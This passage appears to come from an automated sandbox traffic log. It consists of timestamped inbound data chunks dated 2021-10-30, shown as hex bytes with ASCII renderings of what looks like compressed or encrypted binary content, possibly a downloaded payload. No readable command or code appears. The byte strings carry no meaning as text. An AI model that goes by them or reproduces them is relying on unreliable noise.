                                                                                                                                                                                      Data Ascii: ws!m]f0W>NA/Y;Pc :J)3ESS0*YFT#R.cH6#.i/LF7'ah/hb&FB.| ;j~)g]*u;McPu9p&}451J`2lDX,<|C)yTb=
                                                                                                                                                                                      2021-10-30 11:52:12 UTC364INData Raw: 60 e4 5b 9d 27 cb ba 99 ad 1c 2e 00 a8 4d 2e 07 25 95 34 4b 20 6c ff c7 20 8d 9d b4 be 71 b2 73 46 30 d6 81 9a 6d d2 33 cf 28 37 82 25 cd 1f 5f 3c 62 07 5e 03 f7 a7 85 6e 2e f7 1f de 5e de fc e4 c7 2e 0f df 79 53 63 91 be fb f2 55 c3 3a 38 eb a1 34 ca b7 1b dd f5 8c 3a 1d bc a2 2b dd 73 50 48 56 df 8b 10 54 1f 27 88 97 65 73 43 64 ce 1f a4 d1 5a c9 f6 21 19 1b d5 eb 8c 89 75 fa 8a 99 ff 09 ce e0 0a cc 40 74 35 a2 6f f8 9d 4f 5d f4 4d bd 03 03 a6 81 af 43 f8 24 1b c5 e9 13 7d 71 d7 8d 7a 87 39 58 ba 4e 74 c3 5d a9 fe 40 b6 95 71 a6 f7 e8 58 f5 58 81 b9 66 8c 66 ae 1f cd 37 61 07 68 2b 96 a8 74 f2 86 69 68 e6 15 27 49 92 64 61 b1 77 d3 98 5f 04 6b 0a c6 f2 f8 93 c0 8d cf a4 55 90 a6 6b 25 01 1b f9 28 63 2f e9 b2 2a e9 9f e8 c8 37 3f 09 d2 ee 5f 1e 0a 61 fe
                                                                                                                                                                                      Data Ascii: `['.M.%4K l qsF0m3(7%_<b^n.^.yScU:84:+sPHVT'esCdZ!u@t5oO]MC$}qz9XNt]@qXXff7ah+tih'Idaw_kUk%(c/*7?_a
                                                                                                                                                                                      2021-10-30 11:52:12 UTC365INData Raw: 14 a8 ed 21 dc c4 49 c2 ca 40 12 0c ad 40 4d 03 44 20 b6 83 b4 0a da 9c a6 40 6d e4 a5 6c 9f 6c a8 27 8b 17 74 74 16 0a db 77 9a a9 ca cd fa 39 a9 09 d4 e4 bb db 54 48 3e b3 0e e0 a2 5d f5 a0 ca 5f 79 6b 3c d3 56 a3 46 03 59 06 df 20 6d 17 92 41 25 d0 73 80 1a 8b 38 c3 bc 8d 61 5f d0 9e 44 c8 03 9d 16 dd 81 1a ba b8 83 35 bd e5 8a 85 8a 63 b9 e3 65 3c cb a1 85 6e 56 8d e7 6a 6a 09 c2 4e 47 8e 95 23 f2 7c 69 2c 94 d1 17 53 b3 8c 3e 17 20 e7 a2 82 34 07 6a d2 f3 38 10 d9 ee 36 0a b6 a0 83 fc a6 ad 49 a9 06 89 ae a0 de 09 b0 90 a3 07 cb 66 16 e9 42 b9 f9 23 ff ca e5 d5 ff f3 2f 5c 2e 3f fe 13 5a bd f8 fb b4 d2 06 ae 40 0c 7e e3 d1 e5 95 02 b1 0b c1 18 f8 89 8f 5d 6e be 4e c1 99 59 36 b6 3f fe 31 e9 e5 4f fd d4 e5 e9 7f fc 17 2f cf 7f f2 1f f8 5c 32 1d 74 ba
                                                                                                                                                                                      Data Ascii: !I@@MD @mll'ttw9TH>]_yk<VFY mA%s8a_D5ce<nVjjNG#|i,S> 4j86IfB#/\.?Z@~]nNY6?1O/\2t
                                                                                                                                                                                      2021-10-30 11:52:12 UTC367INData Raw: be a5 4a 7d 74 7a ff bf fc c2 e5 ef fc 9f fe df eb fc 42 39 1b 39 e7 99 0b 9c b3 9c 37 ce a5 e7 f7 7d dd d4 de 7a 74 f9 ff 33 f7 1f 80 92 5d d5 99 28 bc fb 76 94 5a 39 07 94 90 84 12 20 11 04 08 04 08 10 41 88 68 8c b1 8d 73 ce 33 e3 3c e3 30 d8 33 7e f8 e1 34 c6 11 cf d8 d8 38 92 73 14 02 21 81 12 ca 39 e7 9c ba d5 52 e7 f4 7f 61 ad bd f7 39 55 b7 bb ef 6d ff 6f bc aa be b3 c2 ce e1 9c bd 6a 9f aa 53 eb d7 6d 04 36 95 75 40 75 d2 04 c7 67 d4 cc 90 d7 5f 5e 97 ed a8 01 18 e7 dd f6 d8 a5 9c f6 43 2f 2b cb f7 9d fb 43 8d 37 3d bd be ac f8 fa ad 65 dd 9d 8f 7b 0e a1 5c 7f 70 06 47 5d e4 a4 25 e7 ae 1a af d9 d0 19 27 1a 24 67 01 97 3b ed a6 71 d6 b1 0b 92 37 b8 63 50 75 91 fa 05 9c 6d 4b 27 cd 8e 9a 77 ca e4 9c 41 f7 17 cb db 02 6f 67 0d d7 12 c8 dc 4d cb 1d
                                                                                                                                                                                      Data Ascii: J}tzB997}zt3](vZ9 Ahs3<03~48s!9Ra9UmojSm6u@ug_^C/+C7=e{\pG]%'$g;q7cPumK'wAogM
                                                                                                                                                                                      2021-10-30 11:52:12 UTC368INData Raw: 59 4e d8 96 88 f4 a9 33 0e 38 9d b9 e4 b6 07 af f1 a9 a3 1e 7b c3 31 3b ec 50 54 f6 3f 26 6d 79 f2 a9 b2 e9 a1 47 30 f6 9c 33 39 87 3d 17 b9 b3 35 03 47 f2 88 ef 7d 73 d9 ef 05 27 95 85 4b 16 47 aa 7f 3f 5a bc df de 65 d3 8a 55 65 c3 e3 4f ba 0e b0 d5 f9 cf 7a 90 c3 be e7 09 87 97 bd 4f 98 dd 09 59 84 05 6e f7 fd f7 2c b7 7d fb 8e 38 df 90 0f 12 eb fc a2 8e 38 ce 9b f9 5a 3e 18 0b f1 db 7e fe 55 3b ec a4 91 76 df 73 97 72 c3 d5 f7 96 15 8f af 8e 3a 3a af 31 61 f4 cb 9e 7b ed 52 7e 04 f9 ef cc 6e da 3f fd f5 05 e5 a1 fb f9 dc 34 4e 27 8c 07 6c fa 50 c4 69 26 6e 27 ed ad bf 72 66 79 c6 89 73 df 7d ea 69 c9 e1 fb 97 75 97 dc 58 66 b6 e2 d3 72 38 68 33 33 bc 1b 81 11 d0 a7 38 60 f7 5d cb e2 b3 e0 a4 2d 9b fc 1e df 8e d0 a6 7b 1f 28 eb be 09 47 0d 03 e4 5b 76
                                                                                                                                                                                      Data Ascii: YN38{1;PT?&myG039=5G}s'KG?ZeUeOzOYn,}88Z>~U;vsr::1a{R~n?4N'lPi&n'rfys}iuXfr8h338`]-{(G[v
                                                                                                                                                                                      2021-10-30 11:52:12 UTC369INData Raw: 0e b6 53 ae 8e 1b 74 c3 7a 1f 47 9c 79 8d 60 07 31 ca 44 1d 5a f9 ac 0f 81 7a 0e f4 06 6e e9 d2 61 d3 2d ea 0a 7c 92 c0 78 e7 84 e5 cf 94 69 db 42 1b f2 56 f8 00 cd 26 27 4f bc 97 cd 1d 2f a0 3c cd 99 bf 4f 1e eb 9b ee 79 a0 6c 5d b3 16 33 f3 3f 1e 6d bc e7 be b2 fe b6 bb 31 17 d0 6f 04 c7 1e 7c 2b ea bd f7 19 a7 95 43 df 79 56 59 c8 ef ce cd 83 b8 00 df fd b5 cb cb 15 ef ff 70 b9 eb 73 df 2a 0f 5d 7c 7d 79 e0 8b 17 46 e8 90 b8 ab c6 f9 37 70 d6 92 a3 2f b9 8d bf c7 31 87 50 d9 2e 3d eb 65 cf 42 ff 7b 3e e7 dc e6 39 d2 5f 78 77 db 67 79 79 e7 2f bf 76 9b 3f 1c d8 16 e9 0f d5 55 37 90 38 0f 69 30 ed ba eb d2 f2 8a d7 1e 1f da fc e8 a3 ff 78 49 bd c6 31 77 9f a3 0d bb ee b9 ac 7c ef 7f 7b 7d 39 f4 b8 03 a1 ed 1c f1 b9 66 ab bf 7c 39 cf 38 9e f9 30 a0 30 0c
                                                                                                                                                                                      Data Ascii: StzGy`1DZzna-|xiBV&'O/<Oyl]3?m1o|+CyVYps*]|}yF7p/1P.=eB{>9_xwgyy/v?U78i0xI1w|{}9f|9800
                                                                                                                                                                                      2021-10-30 11:52:12 UTC374INData Raw: f8 db 6f f9 7a 01 ec b5 ef 6e e5 cd 3f 70 9a c2 76 84 56 3e f6 74 39 ff 8b 37 84 d6 9c b4 45 8b 17 96 1f fd c5 d7 94 a5 f3 fc 35 e9 43 0f 3e 59 fe fa fd 5f 45 dd 59 2b 92 af 37 4b 97 2d 2c bf f5 7b 6f 9f f8 53 f7 73 3f 7b 4d 39 f2 d8 03 b4 7b 34 1f 5a 79 e5 5d e5 d1 73 af f3 75 03 25 99 63 ce 75 f2 6e 2f 7e 76 59 fe ec f9 7f 51 7e c3 95 d7 95 8d d7 de 12 4e 1a b0 60 61 07 e8 70 d4 16 ee b3 47 d9 ed 1d af 8c 14 f3 a7 75 b7 dc 59 36 dd ff 90 f2 a5 83 c6 1f 2d 71 e7 6e f7 17 1c 5f 96 ec b7 73 bb 90 d7 5f 70 47 b9 f6 6b b7 22 cf 05 e5 35 3f fc a2 b2 df 61 6d 2c d6 3e b9 b6 2c 9e c7 98 af 7d f4 e9 72 c3 3f 7c bb 6c c2 a7 25 3b 1b 3c 67 ec 44 f8 a4 20 67 cc ad e1 94 f1 1b bc e4 96 39 e7 44 8a e3 24 fd 18 d2 91 d0 62 0c ee c5 39 6c 01 2e f6 19 9f 60 36 59 6c 6f
                                                                                                                                                                                      Data Ascii: ozn?pvV>t97E5C>Y_EY+7K-,{oSs?{M9{4Zy]su%cun/~vYQ~N`apGuY6-qn_s_pGk"5?am,>,}r?|l%;<gD g9D$b9l.`6Ylo
                                                                                                                                                                                      2021-10-30 11:52:12 UTC376INData Raw: c5 b9 9f e5 58 1e a3 77 be 9a 83 06 20 7d 6f 4b 27 4f 67 27 b8 d0 f5 8c da 86 43 ee 8e e5 ae 99 e1 5b dc 8c c5 57 cf 93 59 4e 5b c7 25 a3 17 53 06 e8 78 79 b7 97 72 0b 4b a7 6c ac f7 0e 5b 8f ea a8 21 bc 3a 60 bc 46 06 ef bf 93 d6 3b 6c cd 41 e3 d8 25 32 5f 5e bb 9a 4d be 03 64 73 eb b8 7c 4a c6 25 55 90 8d e5 86 cc f4 1a 4b c4 cb ae c6 bb 11 9a a7 03 de 2c 33 db ab 3e 4e c0 3e a3 09 23 a0 00 f0 a6 4f 03 e3 38 5e a2 3a 72 a8 41 ef d0 25 9f 86 ea a0 21 8d 50 6d d1 10 c8 6e 19 d1 d9 69 a6 2e 9e 7a 83 3b 07 9d 3e d0 03 c8 83 8e a2 bf ff d4 ec ee 60 da e8 d4 04 ef 01 9b 9d 37 20 65 39 29 76 b8 aa 33 07 b4 5f 7f 8c 91 ce 59 c4 4d 27 07 61 99 97 ed d4 3b 5b c6 0b 78 17 70 04 3a 17 53 6d 2d 8f 4c d7 38 6d f3 87 f2 84 73 96 b0 93 46 8e 36 42 9e 0d e9 a8 6d 40 c7
                                                                                                                                                                                      Data Ascii: Xw }oK'Og'C[WYN[%SxyrKl[!:`F;lA%2_^Mds|J%UK,3>N>#O8^:rA%!Pmni.z;>`7 e9)v3_YM'a;[xp:Sm-L8msF6Bm@
                                                                                                                                                                                      2021-10-30 11:52:12 UTC380INData Raw: 4b 49 71 65 6b e1 da 4d 82 ac 45 8f 3a 60 e7 03 8b 1f ec b9 08 d6 c5 30 39 c2 12 8c d7 fe fb 6d 08 3a 0e bd 33 d7 f4 c8 93 e9 53 06 c6 ce 53 86 d3 5e c3 60 1b 3b 96 19 9e 75 17 14 8f f1 9b 6d 10 9f f6 29 50 99 4c 1b f5 1d c4 95 de c9 bd bd 0b 57 99 80 1d a7 44 2b df bb 3f 06 1d 8a ea 94 01 eb c2 39 13 4f 64 38 b8 9f 36 dd d2 a7 73 d5 9c b5 52 0e 7a f1 51 e5 8c df 7d cb ac df cd ba ff ca 7b ca 97 7f fb b3 e5 be 6b 1f a8 63 91 63 a6 3a 55 9d 75 a3 2d f5 56 c6 ab df b5 73 ff 4b f8 c9 bf bb b8 f0 79 83 3c 47 da 39 53 ca 6b df 7e 72 39 e3 8d 93 3b 69 e7 7e ea ea f2 8f 7f f2 35 38 69 9b e2 c2 8e 71 41 bd 78 d1 57 3f 74 5c 4e da 8f 9c 5e 76 9d e7 5f 2f ed b6 d7 2e 21 e1 3c 41 bf 7f f4 cf 2f 28 2b 1f 5b 1d 35 44 4d 21 b8 c6 fc b1 c3 c2 f2 96 79 ec a6 6d dc b0 a9
                                                                                                                                                                                      Data Ascii: KIqekME:`09m:3SS^`;um)PLWD+?9Od86sRzQ}{kcc:Uu-VsKy<G9Sk~r9;i~58iqAxW?t\N^v_/.!<A/(+[5DM!ym
                                                                                                                                                                                      2021-10-30 11:52:12 UTC384INData Raw: 37 c6 b5 a0 5d 1f b8 80 bd 6a ca f3 e9 b6 47 2b 1f 5e 55 6e 3a ef e6 c8 8b d7 14 5f 36 8e 7a d9 51 e5 f8 b3 87 f9 f1 bf 62 57 dd 3e bf 5d a1 cd 70 ba b6 dc b7 02 e3 8a eb 0a cf a5 04 07 fd f8 43 cb c2 17 35 07 88 b7 48 37 7e f2 d2 32 73 c2 fc be df b7 f1 b2 db ca e6 b5 9b e0 98 61 ae d3 41 c3 89 99 8e da 2e c7 cd ff 91 1c 7b 1f d2 7e cc c1 05 ee 82 8f 5d ad c5 aa 2d 7c 89 7e d1 c2 59 46 60 d1 ba e7 86 fb ca b7 3e d6 fe 06 6c 47 e8 ce 8f 5e 5e ee f8 d0 45 65 cb fa 8d 9d 83 46 a0 e3 aa cc 19 dc cb d4 e2 05 9d c8 73 8b 2f 9e 5b 3a 07 18 1d 2f a5 15 25 f7 72 e1 b9 d0 d6 18 41 b3 c3 7c 60 ef c2 9b ee 98 5a bb 90 2a 91 1f 08 24 23 52 75 c4 46 a8 bb bb 81 bc 25 9f ce 9a c0 bc 11 4f e5 22 bf 44 92 5a 14 7d a0 96 e2 50 fb 44 32 fb c5 7d 33 00 8c 42 2f 0b 1c df a1
                                                                                                                                                                                      Data Ascii: 7]jG+^Un:_6zQbW>]pC5H7~2saA.{~]-|~YF`>lG^^EeFs/[:/%rA|`Z*$#RuF%O"DZ}PD2}3B/
                                                                                                                                                                                      2021-10-30 11:52:12 UTC388INData Raw: b3 ec b3 b5 e7 96 49 b3 e9 ee 28 0a 23 4a bb 80 c3 20 4e 04 a4 5d dc d7 ed 31 70 98 b0 e1 3d d4 33 f3 90 ad 81 77 f1 6c b2 4c 0c 3e e4 53 96 a3 95 e8 75 3a 6b c6 34 67 6e aa 93 06 5d 4e da 04 30 1b c1 c3 51 db 0e d0 80 a6 bb fe ee 74 db d8 18 b6 54 73 3f e2 d1 d6 a7 93 3e 82 b7 b5 5b 3e bd ad 72 85 0d 79 da cd 81 1a 77 8c ce 8e 0a 0f c2 ba 34 6c cb 20 6e 05 6d b6 e7 24 ab 40 65 f2 84 ca f8 2d ac a1 2f 97 61 92 d3 3e 01 9e 10 71 52 cc 86 3e 1f 48 83 f8 d2 53 ee f8 48 ae f5 02 28 0b 19 2f 21 3b da 1e 60 5b d9 17 e6 11 9f 61 a1 4f 20 d3 46 3a da b2 0c ff 58 a4 d9 fb 3c b2 4f cd 2d 1f 7e cc 41 e5 d7 fe f4 c7 cb 31 cf 3e 02 da ec b4 0e 8e cf 5f fc f6 bf 95 6b 2f be 05 f3 ad 5d f4 39 f7 f8 4a 59 97 e4 94 05 c8 0c 0f 64 d9 ad 8e 63 9d ed cb 8b 65 29 fb ce f3 6f
                                                                                                                                                                                      Data Ascii: I(#J N]1p=3wlL>Su:k4gn]N0QtTs?>[>ryw4l nm$@e-/a>qR>HSH(/!;`[aO F:X<O-~A1>_k/]9JYdce)o
                                                                                                                                                                                      2021-10-30 11:52:12 UTC393INData Raw: 74 13 ea 7a 54 d9 63 1e bb 69 37 7f fd b6 f2 d0 75 0f c5 78 78 17 db e3 eb f3 f2 e8 17 1e 56 5e f6 bd 93 ff 5d b9 a3 b4 e2 e1 a7 ca 17 fe ee 12 4c 51 3b 49 3a c7 c8 31 4f c9 79 ce 10 5e c0 f9 1d 0e 73 2e e6 df 3c ef b6 c8 65 fb 74 de 97 af 2f 0f dc ff 84 f3 d6 79 ec 7c fc 13 78 ff ba d0 ba cb 67 99 fc f5 ed ce d2 1a 38 7b e7 fc af 2f ea 97 c7 6a 0b cb 41 db c4 47 58 f5 e0 8a b2 ea be 15 91 72 3a ad bc ed 91 72 e8 99 27 94 67 8c be 3b 77 cb 87 2f 2d f7 5f 7c 07 fa c7 0e 95 ff 69 63 6b 39 f2 ec 53 22 c6 8e d3 93 77 3e 52 ee fe fa 0d ce 07 9e 81 1d 29 38 2b 74 aa a0 93 eb d6 27 ec e4 b7 5f 76 47 a4 9c 1b 9d f3 f9 ab 94 77 3a 67 f9 77 70 d9 4f 79 4d e4 35 d7 d7 41 5d ca 82 30 09 83 6b fd 01 70 08 ee 50 5f e1 c8 71 2e e0 38 e1 a0 01 ed 87 01 76 96 f8 d0 17 fe
                                                                                                                                                                                      Data Ascii: tzTci7uxxV^]LQ;I:1Oy^s.<et/y|xg8{/jAGXr:r'g;w/-_|ick9S"w>R)8+t'_vGw:gwpOyM5A]0kpP_q.8v
                                                                                                                                                                                      2021-10-30 11:52:12 UTC397INData Raw: 3f fc 42 d9 b0 0e 17 77 e8 4c e5 7a 72 ec b7 96 5d f6 db ad bc f4 a7 5e ad 1d d0 b9 d0 45 7f 7f 41 79 e2 81 95 9c be 72 1a 88 ba 53 84 4a a5 93 66 9e 68 0e 9a 1c 97 c0 ca 95 6b ca d7 bf 74 6d 79 12 fc d0 23 f6 2b bb 76 1f 14 3e f1 e1 8b cb b5 57 df 83 76 d6 b3 1a 60 fb a8 83 f3 9c 01 c4 f9 0a c7 ac e7 38 54 e8 0b 11 e2 40 70 f7 05 9d 24 3b 51 de fd b2 c3 e5 2f f6 d3 29 b3 13 b6 4e 0e 1a bf f8 df 1c 35 f3 4e 46 9a ba 83 06 de fa c5 dc 7d e6 b2 b2 ef 1a c2 61 04 5c af 26 67 5f b7 f1 6b 40 10 38 db 13 7d a4 b6 b9 af 1a b7 dc 3b 6e 4e 9b dc e0 7c 1e e6 dd 95 87 f1 6b e1 b6 e7 b9 42 bd 3f 6f 14 37 64 e7 1b 3c f4 a1 2d f4 ca 5b 1c 82 c4 7a 26 a5 2d a9 8f 57 a9 33 b4 3c 00 1c b2 2f ac b3 ae b6 ab 6d 42 d4 3f 01 a3 be c4 1f d7 17 5e 53 c4 ab 93 d6 39 6b 70 98 7c
                                                                                                                                                                                      Data Ascii: ?BwLzr]^EAyrSJfhktmy#+v>Wv`8T@p$;Q/)N5NF}a\&g_k@8};nN|kB?o7d<-[z&-W3</mB?^S9kp|
                                                                                                                                                                                      2021-10-30 11:52:12 UTC401INData Raw: 4a 33 4d ea 11 73 98 c1 64 44 1a 64 8b 00 b4 cb 2a b9 6d ec 13 71 ea 19 ad 86 89 81 aa d0 a4 66 9a 20 55 ab d6 6d 58 49 8e d1 6c 61 a6 69 b6 21 6d 2b c6 36 c3 ba c0 14 73 de 90 fa f9 e4 eb 24 af 85 e9 78 a5 83 16 6b 84 9c b7 9e 7b 17 8d 71 b9 eb 56 9d b5 70 d4 04 3a 6b 74 a6 e8 58 c5 1a 43 e2 da 41 e7 cb 0f b9 5d 5a 16 86 93 b6 30 77 d3 e0 bc cd cc d0 59 e3 6e 5a de 0e 8d 01 90 a3 46 c7 cf b7 3b e9 a8 15 94 e1 dd b4 74 d4 b8 9b b6 b9 2c a6 a3 36 03 47 0d 13 9b 3f a0 59 c6 ef a8 09 0b e1 b8 21 df 5f 3b fb 0f 50 a3 1c 7e 53 3f 09 26 ed cd 56 27 12 38 a5 ca b7 67 1b e9 ba 50 49 27 1f c6 21 d1 de 34 93 ba 31 3a d3 c7 46 63 3d a9 b7 6f 2b 8d e5 56 1e f5 0a 94 49 ee 93 9d 13 88 32 26 4e c8 19 46 a2 ec 6c 9c 97 db 47 ee 36 92 7a 39 49 e9 70 24 b7 0c 1e 42 d5 83
                                                                                                                                                                                      Data Ascii: J3MsdDd*mqf UmXIlai!m+6s$xk{qVp:ktXCA]Z0wYnZF;t,6G?Y!_;P~S?&V'8gPI'!41:Fc=o+VI2&NFlG6z9Ip$B
                                                                                                                                                                                      2021-10-30 11:52:12 UTC405INData Raw: 84 08 eb 6d c3 bf e2 e8 f2 99 02 ff f1 02 16 a3 88 3f e6 b3 a1 85 0f d3 cf 86 a9 f9 a2 e2 18 ce a6 03 d9 ce 94 5d ef 94 03 6a 33 db 34 b2 d3 56 fb c3 60 fd a6 c7 1d 62 58 46 a6 19 c3 e1 10 47 f6 0c eb e5 d4 c1 71 20 67 42 e9 48 4f 72 1c 23 c7 b8 02 7a f6 43 05 02 e8 74 54 07 04 93 d2 bb 45 96 75 8b 8f 27 21 e5 e4 0a 9b 44 3a 33 9a b7 a8 97 cb 48 1e f9 8b 7b cc a8 f7 79 f1 31 17 ed 56 a2 e3 78 17 cb e1 39 b6 ae 6f da a8 3b af 56 46 1f 66 39 9d aa 4c b7 59 65 4d 47 d6 c9 6d cd 3e b0 7d 23 2e 2e e6 19 ee b8 a7 be f4 d8 f2 dc 93 8f 40 0d 76 8c be f2 95 6b cb 17 be 94 5f 2a cf 31 ea c7 39 a1 4b 65 03 ca 6a 64 39 2d e6 18 e4 98 0b a4 de 79 f3 31 91 04 99 71 64 b2 3d d3 38 a8 b3 e9 4d 3d 6c 55 22 29 10 6f 5e 40 1d 42 9e 7a b5 29 aa ed 8e 83 8b 27 c3 26 40 fb 10
                                                                                                                                                                                      Data Ascii: m?]j34V`bXFGq gBHOr#zCtTEu'!D:3H{y1Vx9o;VFf9LYeMGm>}#..@vk_*19Kejd9-y1qd=8M=lU")o^@Bz)'&@
                                                                                                                                                                                      2021-10-30 11:52:12 UTC408INData Raw: 23 b8 81 d3 5f 48 86 c5 0e 02 90 59 26 a6 d3 b6 62 a5 de 73 01 87 0a e8 ac ac ec 35 1c 75 01 bc 68 19 78 0b 7d dc 1d 91 53 6f 83 1b 3a 02 26 31 2c 6b 87 11 e5 54 4c b5 79 e0 74 61 af 76 c8 10 6c eb c3 87 71 72 e0 1b 92 a6 d8 06 f9 39 9f 46 63 db 38 af a4 61 9e 8e 9f 36 23 f3 97 2e 46 1e 8b b2 0c bc 98 e6 c5 b6 bb 20 eb d6 d3 22 c0 8f d5 90 0c 67 8d 8f db 48 bb d1 5f c0 9d 67 f6 07 fb 2c a9 8e 41 a2 da 72 2c 89 b6 ad 9c 5f e0 6c a0 dd ce de 64 dc 31 98 7f f2 28 87 5c 75 6b f5 9b 5c b4 31 b7 c0 eb 87 0f cc 85 26 77 08 1b f3 11 87 f0 81 ff 7d 2e a4 d9 69 e5 93 6b ca 05 df ba c5 7d 34 ba 50 24 98 5f d5 33 de 0e 22 c7 58 9c 3a c7 23 f5 e0 19 56 d3 74 b0 2d c7 91 69 0d 8f af c7 39 c3 fa 71 17 18 2f e2 b6 38 c8 8f 65 8a a3 8f c4 c2 26 6e ca fa 09 91 a6 ca 1d 94
                                                                                                                                                                                      Data Ascii: #_HY&bs5uhx}So:&1,kTLytavlqr9Fc8a6#.F "gH_g,Ar,_ld1(\uk\1&w}.ik}4P$_3"X:#Vt-i9q/8e&n
                                                                                                                                                                                      2021-10-30 11:52:12 UTC412INData Raw: 65 39 68 c1 2d c3 89 0e ae b4 e0 d9 c7 ea 73 40 0e b3 c6 c4 7a 02 b1 83 93 54 aa b9 85 66 11 4b 8d d2 e0 20 6a 12 f2 0e 3e 2f 52 62 9d 9e a8 33 4f ae b8 f5 c9 93 8e 3c 76 d0 7a ce f0 1c 4f f7 d3 a4 73 36 83 13 66 9a a3 36 95 b2 03 10 47 ad 96 6a db 58 27 b5 f6 4e b3 99 fa 7e 4e 51 6d 0c 85 4c 08 03 b9 6d 7d 9c 94 23 0c 07 4b e4 53 74 49 a6 26 67 1d cd b3 2f 72 3e ba 7d ad dd e2 11 32 a6 cc 73 7a 39 43 ea 53 67 de 3d b5 72 1a d5 61 08 ea e3 4c 9e a9 99 65 df 52 cb 99 aa cf ae e5 1d b9 0e fa c1 81 e3 be 91 1c bc 1d 87 64 5b 57 b7 1c 3c d9 00 bd 79 e0 d1 a3 e5 b1 b6 6c bb a2 75 36 eb 16 51 42 57 70 da e7 42 7d bd c7 e3 2e 29 fb a0 6b b7 61 ea af 89 3b 5e 7e 4b 33 a0 a9 e6 59 e2 0e 68 47 e2 6c 9b a2 77 4d 75 9c 92 a6 b5 ac 2b 13 62 ce 86 50 42 4b 5b 27 49 98
                                                                                                                                                                                      Data Ascii: e9h-s@zTfK j>/Rb3O<vzOs6f6GjX'N~NQmLm}#KStI&g/r>}2sz9CSg=raLeRd[W<ylu6QBWpB}.)ka;^~K3YhGlwMu+bPBK['I
                                                                                                                                                                                      2021-10-30 11:52:12 UTC416INData Raw: 0e 2d 3d 1d e3 53 32 24 4b 7a 6a c6 8f 3e 8d df 89 e7 c7 9d 7e 9a 96 a7 6a 7e a2 56 b7 13 ed cc ad 4f f7 5b be 86 f7 43 b1 62 65 3f 45 6f 58 be b7 37 d2 07 8c cf e0 79 08 13 51 dc 74 c7 b5 9a 64 e1 6b e9 b6 cc 6b 51 ff 02 01 10 c2 3c 55 cb 93 b3 24 60 48 da 40 95 c0 25 11 cb 2d 03 68 ee 79 1f 70 6f 8c 3c 64 79 5f 40 4b e6 a6 a0 4c 47 dd 27 f1 7a 19 9a 2f 4d 1b 0c ae b5 a0 fa 0e b0 39 c3 f8 75 1d 10 73 8c 63 a8 37 28 e3 e2 26 f5 f7 14 7c e8 60 a3 36 5f 58 2d 78 ee b9 6e f9 d3 0c ef 15 37 49 6d 1a 6d 02 ea 39 c1 9a e1 9a a4 5a 2b 1d f4 5a a3 78 9d eb d5 a8 ba c2 67 38 ea a8 6d d7 92 ca 85 a8 c7 6b 99 f3 91 79 f0 ab e6 41 ba 53 16 72 6e 44 71 0f cb 66 59 9e e5 43 5f db 24 97 8e 50 64 41 e2 30 eb 31 84 2f ef 52 1d 20 7b e0 85 c3 22 23 7b 16 77 1d 4f d5 92 57
                                                                                                                                                                                      Data Ascii: -=S2$Kzj>~j~VO[Cbe?EoX7yQtdkkQ<U$`H@%-hypo<dy_@KLG'z/M9usc7(&|`6_X-xn7Imm9Z+Zxg8mkyASrnDqfYC_$PdA01/R {"#{wOW
                                                                                                                                                                                      2021-10-30 11:52:12 UTC420INData Raw: 4f db a9 0b 3c 6b 01 0f aa 2b 3c ce b0 d6 07 6d 7b fd 49 5a b4 ce 10 5c 84 74 45 9a f9 dc 94 a0 96 50 4f 9f 04 61 8d f2 a3 cf fd fd 34 25 68 f5 d1 a7 9e b0 41 c7 27 6a 7a aa 06 5f 7f a7 d9 3f a8 38 ff 48 0c 01 70 12 4a 03 9b 75 44 f8 ea a7 64 d6 f9 00 9e d4 f5 fd 27 47 2a 5e ae 5f ac 6b fd 60 c2 35 de 89 1a 92 34 e2 4e d4 fa 89 1a bf a7 c6 3d 50 6b 9f 31 a1 6d ed 41 24 60 fa 3b 70 4c d0 94 a4 21 59 bb 25 6a d8 b3 a4 b5 9f 59 17 91 7d f1 ee bf fe fb 3f fb c8 e4 20 b3 cb e9 74 a8 8a 5b 7c 68 27 67 a5 4b 82 a6 31 83 52 29 5a 60 9d 58 40 32 55 09 6f 80 6f e8 e7 c2 f4 b7 7b 06 5c c4 28 18 b7 e1 e6 00 db 5d f7 1a e0 7b 69 ab cb d6 af e1 d6 02 8d ac 51 ea 85 4b 8b 82 4f 89 76 b2 36 df 57 1b ca e4 cd 7e f4 27 6a b3 00 79 2f 92 84 29 51 53 62 46 be 3e f6 2c db 07
                                                                                                                                                                                      Data Ascii: O<k+<m{IZ\tEPOa4%hA'jz_?8HpJuDd'G*^_k`54N=Pk1mA$`;pL!Y%jY}? t[|h'gK1R)Z`X@2Uoo{\(]{iQKOv6W~'jy/)QSbF>,
                                                                                                                                                                                      2021-10-30 11:52:12 UTC425INData Raw: f1 14 cf 1b 67 4e e0 6a d4 04 09 e6 bb c9 05 d2 1d 06 c7 71 c7 ba 18 67 a1 93 af da 5c 92 1f 28 2e 25 6c aa 3b 9b 93 40 5d bd 0a 26 c6 d6 69 08 35 8e 22 db 5f 58 fa 86 5e 07 b4 d9 a7 9f 98 6e db 05 d8 ae c6 c6 8b 14 8b 75 92 34 46 4e 2a af a2 6c 6e 6d 9c 46 1f 1c e2 d7 41 81 e2 33 91 0d 1b 95 47 6e 14 1c c2 27 c1 11 07 ab de ad fa 73 7b 73 28 bc 81 15 b7 e7 a2 10 96 c3 a7 d0 76 70 2e 8c b1 55 69 1b 85 d2 91 1e b2 75 84 f0 25 a9 b4 d2 c4 72 51 41 f9 96 ce f5 c3 57 3f c5 d3 69 fa b1 1c 10 d7 ba bb cd 52 71 ad 60 df b6 04 d2 3e c1 36 a0 5f e6 8b 13 b4 38 7a d5 49 8c 2a cc 37 6d b8 ca 4f 70 8d 0e c0 76 16 66 8e 44 e3 4d 59 45 6b 04 f6 18 bd b7 4c ad c4 de 47 7b 8f 55 b2 56 76 51 61 81 fa 9e fd e5 04 cd c9 99 fe 5c 81 92 b3 a2 f2 29 9a 3d c8 1f a6 14 09 db d9
                                                                                                                                                                                      Data Ascii: gNjqg\(.%l;@]&i5"_X^nu4FN*lnmFA3Gn's{s(vp.Uiu%rQAW?iRq`>6_8zI*7mOpvfDMYEkLG{UVvQa\)=
